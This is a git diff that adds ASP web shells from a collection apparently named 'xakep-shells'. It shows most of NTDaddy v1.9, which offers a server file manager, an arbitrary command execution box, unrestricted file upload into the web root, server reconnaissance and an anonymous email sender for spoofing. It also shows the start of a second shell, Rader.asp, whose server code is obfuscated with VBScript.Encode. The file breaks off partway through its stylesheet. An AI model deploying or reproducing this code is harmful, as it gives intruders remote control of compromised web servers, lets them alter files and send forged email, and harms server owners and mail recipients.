+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set fc = f.Files
+response.write("<form name=lstFiles action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=submit value=RefreshFiles> <input type=checkbox name=chkShowFileInfo value=TRUE> Show File Info &<br>Show Only:  <input type=text name=txtShowPrefix value= ></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFile><input type=submit name=cmdOption Value=CopyFile> to <input type=text name=CopyFileTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=OpenTextFile><select name=optioMode><option value=" & chr(34) & "1" & chr(34) & ">For Reading <option value="& chr(34) & "2" & chr(34) & ">For Writing <option value=" & chr(34) & "8" & chr(34) & ">For Appending</select><select name=optformat><option value=" & chr(34) & "-2" & chr(34) & ">System Default <option value=" & chr(34) & "-1" & chr(34) & ">Unicode <option value=" & chr(34) & "0" & chr(34) & ">ASCII</select></td>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFileAttributes>")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & fp & chr(34) & "></tr>")
+if showfileinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>File</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in fc
+if showfileinfo="TRUE" then
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr>")
+response.write("<td align=center nowrap><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+select case f1.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FileAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "</td></tr>")
+end if
+else
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr><td><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td></tr>")
+end if
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+%>
+<STYLE>
+BODY
+{scrollbar-face-color: #f8f8ff; scrollbar-shadow-color: #cccccc;
+scrollbar-highlight-color: #cccccc; scrollbar-3dlight-color: #cccccc;
+scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000;
+scrollbar-arrow-color: #000000}
+</STYLE>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<center>
+<font size="18" color="#ffffff">NTDaddy | fux0r inc.</font>
+<hr color="#ffffff">
+<table border=1 width="100%" color="#fffff">
+<tr>
+<td align=center width=100% bgcolor=#ffffff><font color=#000000><a name=lblCurrentPath value=
+<% 
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+end if
+response.write(chr(34) & IP & chr(34) & ">" & FP)
+%>
+</a></td>
+</tr>
+</table>
+<table border=0 cellspacing=1 bordercolor="#ffffff" width=100% height=100%>
+<tr colspan=3><td align=left colspan=3><% =ShowDriveLetters() %></td>
+<td align=center></td></tr>
+<tr valign=top width=100%><td align=left><% =ShowFolderNames() %></td>
+<td align=right><% =ShowFileNames() %></td>
+</tr>
+</table>
+<br><hr color="#ffffff"><br>
+<table cellpadding="3" cellspacing="3" border="5" bordercolor="#ffffff">
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>� Remote Info.</b></font>
+</td>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>� Local Info.</b></font>
+</td>
+</tr>
+<tr>
+<td align=left>
+<div align=left><font size="3">
+<b>User</b>: <%= "\\" & oScriptNet.ComputerName & " \ " & oScriptNet.UserName %> <br>
+<b>ID</b>: <%=request.servervariables("SERVER_NAME")%> <br>
+<b>IP</b>: <%=request.servervariables("LOCAL_ADDR")%> <br>
+<b>HTTPD</b>: <%=request.servervariables("SERVER_SOFTWARE")%> <b>Port</b>: <%=request.servervariables("SERVER_PORT")%> <br>
+<b>Webroot</b>: <%=request.servervariables("APPL_PHYSICAL_PATH")%> <br>
+<b>LogRoot</b>: <%=request.servervariables("APPL_MD_PATH")%> <br>
+<b>Date</b>: <% =date() %> <br>
+<b>Time</b>: <%=time() %> <br>
+<b>HTTPs</b>: <%=request.servervariables("HTTPS")%>
+<br></font></div>
+</td>
+<td align="left" valign="top">
+<b>Local Addr (What they see.)</b>: <%=request.servervariables("REMOTE_ADDR")%> <br>
+<b>Forwarded from</b> : <%=request.servervariables("HTTP_X_FORWARDED_FOR")%> <br>
+<b>Via</b>: <%=request.servervariables("HTTP_VIA")%> <br>
+<b>User Agent</b>: <%=request.servervariables("HTTP_USER_AGENT")%> <br>
+<b>Wookie</b>: <%=request.servervariables("HTTP_WOOKIE")%> <br>
+<b>Cache Control</b>: <%=request.servervariables("HTTP_CACHE_CONTROL")%> <br>
+<b>Interface</b>: <%=request.servervariables("GATEWAY_INTERFACE")%> <br>
+<b>Protocol</b>: <%=request.servervariables("SERVER_PROTOCOL")%> <br>
+<b>Method</b>: <%=request.servervariables("REQUEST_METHOD")%>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<table cellpadding="3" cellspacing"1" bordercolor="#F8F8FF" border=5>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>� File Upload Utility</b></font></td>
+</tr>
+<tr>
+<td align="left">
+<form method=post ENCTYPE="multipart/form-data">
+<b>File</b> : <input type="file" size="35" name="File1"><br>
+<input type="submit" Name="Action" value="Upload the file">
+</form></td>
+</tr>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>� RAW D.O.S. COMMAND INTERFACE</b></font></td>
+</tr>
+<tr valign="top">
+<td align="left">
+<form action="<%= Request.ServerVariables("URL") %>" method="POST">
+<p><input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="submit" value="Run"> </p>
+</form>
+<pre>
+<%
+If (IsObject(oFile)) Then
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If%>
+</pre>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<form action=ntdaddy.asp method=post>
+<form action=ntdaddy.asp method=post>
+<table border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="400">
+<tr>
+<td bgcolor="#F8F8FF" colspan="2"><font color="#000000" align="left"><b>� Anonymous Email Utility</b></font></td>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>From:</b></font> </td>
+<td><input name=From size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>To:</b></font> </td>
+<td><input name=To size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>Subject:</b></font> </td>
+<td><input name=Subject size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td valign="top" bgcolor="#F8F8FF"><font color="#000000"><b>Body:</b></font> </td>
+<td><textarea cols=30 name=Body rows=5 style="HEIGHT: 86px; WIDTH: 322px" wrap=virtual></textarea></td>
+</tr>
+<tr>
+<td align="right" bgcolor="#F8F8FF" colspan="2">
+<input type="submit" value="Send Mail">
+<input type="hidden" name="flag" value="1"></td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<font size="#ffffff"><center>�[ <b>NTDaddy v1.9</b> ][ by obzerve ][ for the brothers of <b>fux0r inc.</b> 2k+1 ]�</b></center></font>
+</body>
+</html>
+<SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>
+Const IncludeType = 2 
+Dim UploadSizeLimit
+Function GetUpload()
+Dim Result
+Set Result = Nothing
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Dim CT, PosB, Boundary, Length, PosE
+CT = Request.ServerVariables("HTTP_Content_Type") 
+If LCase(Left(CT, 19)) = "multipart/form-data" Then 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 Then Boundary = Mid(CT, PosB + 9) 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 then 
+PosB = InStr(Boundary, ",")
+If PosB > 0 Then Boundary = Left(Boundary, PosB - 1)
+end if
+Length = CLng(Request.ServerVariables("HTTP_Content_Length")) 
+If "" & UploadSizeLimit <> "" Then
+UploadSizeLimit = CLng(UploadSizeLimit)
+If Length > UploadSizeLimit Then
+Request.BinaryRead (Length)
+Err.Raise 2, "GetUpload", "Upload size " & FormatNumber(Length, 0) & "B exceeds limit of " & FormatNumber(UploadSizeLimit, 0) & "B"
+Exit Function
+End If
+End If
+If Length > 0 And Boundary <> "" Then 
+Boundary = "--" & Boundary
+Dim Head, Binary
+Binary = Request.BinaryRead(Length) 
+Set Result = SeparateFields(Binary, Boundary)
+Binary = Empty 
+Else
+Err.Raise 10, "GetUpload", "Zero length request ."
+End If
+Else
+Err.Raise 11, "GetUpload", "No file sent."
+End If
+Else
+Err.Raise 1, "GetUpload", "Bad request method."
+End If
+Set GetUpload = Result
+End Function
+Function SeparateFields(Binary, Boundary)
+Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary
+Dim Fields
+Boundary = StringToBinary(Boundary)
+PosOpenBoundary = InStrB(Binary, Boundary)
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0)
+Set Fields = CreateObject("Scripting.Dictionary")
+Do While (PosOpenBoundary > 0 And PosCloseBoundary > 0 And Not isLastBoundary)
+Dim HeaderContent, FieldContent, bFieldContent
+Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Dim Field, TwoCharsAfterEndBoundary
+PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf))
+HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2)
+bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2)
+GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Set Field = CreateUploadField() 
+Set FieldContent = CreateBinaryData()
+FieldContent.ByteArray = bFieldContent
+FieldContent.Length = LenB(bFieldContent)
+Field.Name = FormFieldName
+Field.ContentDisposition = Content_Disposition
+Field.FilePath = SourceFileName
+Field.FileName = GetFileName(SourceFileName)
+Field.ContentType = Content_Type
+Field.Length = FieldContent.Length
+Set Field.Value = FieldContent
+Fields.Add FormFieldName, Field
+TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2))
+isLastBoundary = TwoCharsAfterEndBoundary = "--"
+If Not isLastBoundary Then 
+PosOpenBoundary = PosCloseBoundary
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary)
+End If
+Loop
+Set SeparateFields = Fields
+End Function
+Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type)
+Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";"))
+Name = (SeparateField(Head, "name=", ";")) 
+If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2)
+FileName = (SeparateField(Head, "filename=", ";")) 
+If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2)
+Content_Type = LTrim(SeparateField(Head, "content-type:", ";"))
+End Function
+Function SeparateField(From, ByVal sStart, ByVal sEnd)
+Dim PosB, PosE, sFrom
+sFrom = LCase(From)
+PosB = InStr(sFrom, sStart)
+If PosB > 0 Then
+PosB = PosB + Len(sStart)
+PosE = InStr(PosB, sFrom, sEnd)
+If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf)
+If PosE = 0 Then PosE = Len(sFrom) + 1
+SeparateField = Mid(From, PosB, PosE - PosB)
+Else
+SeparateField = Empty
+End If
+End Function
+Function GetFileName(FullPath)
+Dim Pos, PosF
+PosF = 0
+For Pos = Len(FullPath) To 1 Step -1
+Select Case Mid(FullPath, Pos, 1)
+Case "/", "\": PosF = Pos + 1: Pos = 0
+End Select
+Next
+If PosF = 0 Then PosF = 1
+GetFileName = Mid(FullPath, PosF)
+End Function
+Function BinaryToString(Binary)
+dim cl1, cl2, cl3, pl1, pl2, pl3
+Dim L
+cl1 = 1
+cl2 = 1
+cl3 = 1
+L = LenB(Binary)
+Do While cl1<=L
+pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
+cl1 = cl1 + 1
+cl3 = cl3 + 1
+if cl3>300 then
+pl2 = pl2 & pl3
+pl3 = ""
+cl3 = 1
+cl2 = cl2 + 1
+if cl2>200 then
+pl1 = pl1 & pl2
+pl2 = ""
+cl2 = 1
+End If
+End If
+Loop
+BinaryToString = pl1 & pl2 & pl3
+End Function
+Function BinaryToStringold(Binary)
+Dim I, S
+For I = 1 To LenB(Binary)
+S = S & Chr(AscB(MidB(Binary, I, 1)))
+Next
+BinaryToString = S
+End Function
+Function StringToBinary(String)
+Dim I, B
+For I=1 to len(String)
+B = B & ChrB(Asc(Mid(String,I,1)))
+Next
+StringToBinary = B
+End Function
+Function vbsSaveAs(FileName, ByteArray)
+Dim FS, TextStream
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set TextStream = FS.CreateTextFile(FileName)
+TextStream.Write BinaryToString(ByteArray) 
+TextStream.Close
+End Function
+</SCRIPT>
+<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
+function CreateUploadField(){ return new uf_Init() }
+function uf_Init(){
+this.Name = null
+this.ContentDisposition = null
+this.FileName = null
+this.FilePath = null
+this.ContentType = null
+this.Value = null
+this.Length = null
+}
+function CreateBinaryData(){ return new bin_Init() }
+function bin_Init(){
+this.ByteArray = null
+this.Length = null
+this.String = jsBinaryToString
+this.SaveAs = jsSaveAs
+}
+function jsBinaryToString(){
+return BinaryToString(this.ByteArray)
+}
+function jsSaveAs(FileName){
+return vbsSaveAs(FileName, this.ByteArray)
+}
+</SCRIPT>
+<%
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Set Fields = GetUpload()
+FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName
+Fields("File1").Value.SaveAs FilePath
+End If
+%>
+<%
+Else
+Dim anonFrom,anonTo,anonSubj,anonBody
+anonFrom = request.form("From")
+anonTo = request.form("To")
+anonSubj = request.form("Subject")
+anonBody = request.form("Body")
+Set objMail = CreateObject("CDONTS.NewMail")
+objMail.From=anonFrom
+objMail.To=anonTo
+objMail.Subject=anonSubj
+objMail.Body=anonBody
+intReturn=objMail.Send()
+%>
+<html>
+<head><title>|[NTDaddy v1.9 | anon email]</title></head>
+<h1>Message sent successfully!</h1><br><br><br>
+<table border=0 cellpadding="0" cellspacing="3">
+<tr>
+<td>
+<input type='button' value='Back' onclick=history.back()> </td>
+<td>
+<h2>[NTDaddy v1.9 - obzerve | fux0r inc.]</h2> </td>
+</tr>
+</table>
+</html>
+<%
+End if
+%>
+
+
+
diff --git a/xakep-shells/ASP/Rader.asp.txt b/xakep-shells/ASP/Rader.asp.txt
new file mode 100644
index 0000000..6cec6a0
--- /dev/null
+++ b/xakep-shells/ASP/Rader.asp.txt
@@ -0,0 +1,116 @@
+<%@ LANGUAGE = VBScript.Encode %>
+
+
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<!--
+         
+            
+            
+             HACKING 
+              Mehdi & HolyDemon
+                 www.infilak.tr.cx & www.infilaktim.tk
+           
+-->
+<%#@~^FAAAAA==G	PnMDKDPM+k;:PU+XYtwcAAA==^#~@%> 
+<%#@~^2QgAAA==@#@&w.K{	l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9���x�"P��bx~P�+30�.PAN+Mr"R@!Vb@*~A;~Um.kaOk	P3U,�x+hsbP�"+^sb�k~"l0kw^+MrPVk8k,|Cz�DP`^Go*P@!(.@*Y!Yslhld�[�MR R@!sk@*A;~UmDr2DkUPgCk�V~nE^Vl	�Vm^l��,5CD9�:~$�^�:�x9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klU�y,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~A�^�:�	Nnx~)HD�UY�^�~AbVLrHkP$;^l8k^rM/r	k.RR,@!^r@*Il.N�sP#n,f+kO+0V+MrUNx,fGVCz�,CGVH9+sWU~j+P3VKDG:mUEl~�KW0PK�+0V�D,2[+Mkh c@!Vb@*?1DkaOr:bybP!�\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmx�s~Cm3V�x9l~!xk�,$k^ok,)s:m3,��kUP( gRoPz[:bx~#Xl~!�M+-VbsDrHVPM�M���x�. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$�I,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACO�^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh	R&UsbSCVcKD /o@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C	kcmWs@*AVWMWhl	R\n0lxb ZK:@!JC@*[	4kwI[U8kwI[	8/ai'U(/wI'	4dwp'	4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl	+kk YV@*nl./KU26/CU/k O0@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[	4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI'	4/2ILx8/aILx8kwp[x(/aI[	4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6�x[C	PqcHRwPKChPzN�	l~5C"�^:��O�Dc@!4M@*@!sb@*�m.nDVrPjn,�m.Ykky,bk2P_WdY^l.�U,K�:�	[+,�lV���M  @!(D@*@!sk@*@!J4@*b9.+kPjCD�D�PF�ds�xCPnG9EU!PV�D�xD�Vh+0P�dYNr�r	ky,9WkXl	�U~b9�x�,XCy�U c@!8D@*@!Vb@*PnXYl.nmP$�V�s�~A�+.,AK�/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lU�U,fG/HCVmD�U�~V�D�xO�sXn4bss+V,��k	PbHx�,j+M\nD9+~6^:l	�"Pdly�s~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPn�ds�xC,Km:Pj+MrPVk.k^k.~v�Dx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n	YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W	Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k	~Kl	+^kU+~i^l�hl@!8D@*@!sr@*bNhr	P�r0MnkkUbP�mV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,f�+.Vn.bP�CVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k	P#+Mk~Pm4l	slM�x�P�	[rDs+,\dR  @!4.@*@!8D@*@!^n	Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACf�@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk	L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+	[Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr	'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r	0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32>&nbsp;<Font size=2 Color=000000 Face=Verdana><b>Adres : </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> &nbsp; <input type=submit value="Kodlar� G�ster" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail.com title="E-mail G�nder"><font face=wingdings color=lime size=4>*</font> </a>&nbsp; <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a>&nbsp; <a href="?action=help" title="Yard�m" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a>&nbsp;</td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
+<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn	N@#@&0GN^l.~{P/n.7+.R4OsV3	mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
+<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+BODY {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+P {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+DIV {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+
+A:link {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:active {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:visited {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A.postlink {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: #dd6900
+}
+.bodyline {
+	BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
+}
+INPUT {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+TEXTAREA {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+SELECT {
+	BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
+}
+IMG {
+	BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
+}
+TH {
+	PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
+}
+TD.cat {
+	FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
+}
+.title {
+	FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.content {
+	BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
+}
+.block-title {
+	FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
+}
+.storytitle {
